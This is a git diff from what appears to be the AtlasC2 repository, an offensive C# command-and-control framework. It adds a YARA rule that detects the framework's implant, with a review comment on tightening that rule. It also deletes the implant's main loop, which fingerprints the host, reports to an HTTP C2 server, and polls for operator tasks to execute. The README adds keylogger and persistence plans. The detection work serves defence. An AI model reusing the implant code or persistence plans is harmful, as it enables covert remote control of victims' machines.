diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 0000000..f7a49e8
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,4 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+ko_fi: grimmie
diff --git a/AtlasImplant.yar b/AtlasImplant.yar
new file mode 100644
index 0000000..3493f7b
--- /dev/null
+++ b/AtlasImplant.yar
@@ -0,0 +1,61 @@
+rule AtlasImplant_Yara {
+ meta:
+ last_updated = "3-20-2022"
+ author = "Grimmie (@Gr1mmie)"
+ description = "Searches for strings present in the Atlas C2 Implant"
+ md5 = "7bbb5fce0b18f613674fd09da14e5e45"
+
+ strings:
+ // system namespaces
+ $systemNamespace1 = "System.Net" ascii
+ $systemNamespace2 = "System.Text" ascii
+ $systemNamespace3 = "System.Linq" ascii
+ $systemNamespace4 = "System.Timers" ascii
+ $systemNamespace5 = "System.Runtime" ascii
+ $systemNamespace6 = "System.Reflection" ascii
+ $systemNamespace7 = "System.Collections" ascii
+ $systemNamespace8 = "System.Diagnostics" ascii
+ $systemNamespace9 = "System.Security" ascii
+ $systemNamespace10 = "System.Management.Automation" ascii
+
+ // misc stuffs
+ $misc1 = "ImplantDataUtils" ascii
+ $misc2 = "ImplantTaskUtils" ascii
+ $misc3 = "ImplantOptionUtils" ascii
+ $misc4 = "ImplantCommands" ascii
+ $misc5 = "ImplantTask" ascii
+ $misc6 = "ImplantTaskOptions" ascii
+ $misc7 = "ImplantOptions" ascii
+ $misc8 = "ImplantCommandsInit" ascii
+ $misc9 = "ImplantInit" ascii
+ $misc10 = "PollImplant" ascii
+ $misc11 = "ImplantTaskOut" ascii
+
+ // comms stuffs
+ $comms1 = "+Implant.Models.HTTPComms+d__16" ascii
+ $comms2 = "(Implant.Models.HTTPComms+d__18" ascii
+ $comms3 = "%Implant.Models.HTTPComms+d__19" ascii
+
+ // getter stuffs
+ $get1 = "get_assemParams" ascii
+ $get2 = "get_assemBytes" ascii
+ $get3 = "get_targetDir" ascii
+ $get4 = "get_procIDLen" ascii
+ $get5 = "get_procSessionIDLen" ascii
+ $get6 = "get_procNameLen" ascii
+ $get7 = "get_fileNameLen" ascii
+ $get8 = "get_dirNameLen" ascii
+ $get9 = "get_fileSizeLen" ascii
+ $get10 = "get_CurrentDomain" ascii
+ $get11 = "get_IsCancellationRequested" ascii
+ $get12 = "get_Command" ascii
+ $get13 = "get_assemMethod" ascii
+
+ condition:
+ uint16(0) == 0x5A4D and
+ all of $systemNamespace* and
+ all of $misc* and
+ all of $comms* and
+ 3 of $get*
+
+}
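Review bot: The three `$comms*` strings look like length-prefixed serialized type names of compiler-generated async state machines (the leading `+`, `(` and `%` being the compressed length byte and `d__16`/`d__18`/`d__19` the compiler-assigned suffixes, with the usual `<Method>` part apparently stripped from this listing), so `all of $comms*` in the condition will silently stop matching after any edit to `HTTPComms` that renumbers a state machine or changes a name's length; `any of $comms*`, or a plain `$comms0 = "Implant.Models.HTTPComms" ascii` anchor, would survive a rebuild. `3 of $get*` is also a weak threshold because `get_CurrentDomain`, `get_IsCancellationRequested` and `get_Command` are ordinary BCL/member names found in many unrelated .NET assemblies, so raising it to around `5 of $get*` keeps the rule tied to the implant-specific getters. Adding a `filesize < 2MB` term next to `uint16(0) == 0x5A4D` would bound scan cost on large file sets, assuming the implant binary stays well under that. Finally, `last_updated = "3-20-2022"` is ambiguous outside US date order; ISO 8601 `2022-03-20` is the usual convention in rule metadata.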
diff --git a/Implant/TestExe.cs b/Implant/TestExe.cs
deleted file mode 100644
index 3d8ba1e..0000000
--- a/Implant/TestExe.cs
+++ /dev/null
@@ -1,87 +0,0 @@
-using System;
-using System.Collections.Generic;
-using System.Diagnostics;
-using System.Linq;
-using System.Reflection;
-using System.Threading;
-
-using Implant.Models;
-using Implant.Utils;
-
-namespace Implant
-{
- class Program
- {
- private static ImplantData _implantData;
- private static Comms _comms;
- private static CancellationTokenSource _cancelToken;
-
- private static List _commands = new List();
-
- //put into utils
- public static void GenImplantData(){
- var proc = Process.GetCurrentProcess();
-
- _implantData = new ImplantData {
- // get DNS hostname
- ID = ImplantDataUtils.GenImplantName(), HostName = Environment.MachineName,
- User = Environment.UserName, Integrity = ImplantDataUtils.ReturnIntegrity(),
- Arch = ImplantDataUtils.ReturnArch(),
- ProcID = proc.Id, ProcName = proc.ProcessName,
- IPAddr = ImplantDataUtils.GetHostIP()
- };
-
- proc.Dispose();
- }
-
- public static void SendTaskOut(string _id, string _out) {
- var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out };
- _comms.DataSend(taskOut);
- }
-
- public static void HandleTask(ImplantTask task) {
- var command = _commands.FirstOrDefault(cmd => cmd.Name.Equals(task.Command, StringComparison.InvariantCultureIgnoreCase));
- if (command is null) { return; }
-
- var _out = command.Execute(task);
- SendTaskOut(task.Id, _out);
- }
-
- public static void HandleTasks(IEnumerable tasks) {
- foreach (var task in tasks) { HandleTask(task); }
- }
-
- public static void ImplantCommandsInit()
- {
- foreach (Type type in Assembly.GetExecutingAssembly().GetTypes())
- {
- if (type.IsSubclassOf(typeof(ImplantCommands)))
- {
- ImplantCommands cmd = Activator.CreateInstance(type) as ImplantCommands;
- _commands.Add(cmd);
- }
- }
- }
-
- public void Stop() { _cancelToken.Cancel(); }
-
- static void Main(string[] args) {
-
- Thread.Sleep(10000);
-
- GenImplantData();
- ImplantCommandsInit();
-
- _comms = new HTTPComms("localhost", 8080);
- _comms.ImplantInit(_implantData);
-
_comms.Start();
- _cancelToken = new CancellationTokenSource();
-
- while (!_cancelToken.IsCancellationRequested) {
- if (_comms.DataRecv(out var tasks)) { HandleTasks(tasks); }
- }
- }
-
- }
-}
diff --git a/README.md b/README.md
index 2033469..0a800c7 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # AtlasC2 C# C2 Framework centered around Stage 1 operations
-Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all.
+Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all. Currently targets only windows environments
 ## Usage
@@ -77,7 +77,8 @@ Open .sln and build all 3 components in Release mode
 * Add admin utils:
 * `cp`
 * `upload`/`download`
-* Some barebones persistence commands (idk something like creating a user via ADSI)
+* Keylogger (probs make standalone to load into implant)
+* Some barebones persistence commands (idk something like creating a user via ADSI, WMI subscription creation. probs make these standalone assems to load into implant)
 * Allow for the changing of the sleep timing on implant and implement jitter
 * Allow for operator to change port TeamServer starts on via CLI
 * Encrypted comms (yikes, ik)
@@ -90,8 +91,5 @@ Open .sln and build all 3 components in Release mode
 * Shellcode generation via Donut
 * BOFs would be cool
-
-### Note To Self: u forgot YARA rule. dewit
-
 ## Disclaimer
 Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas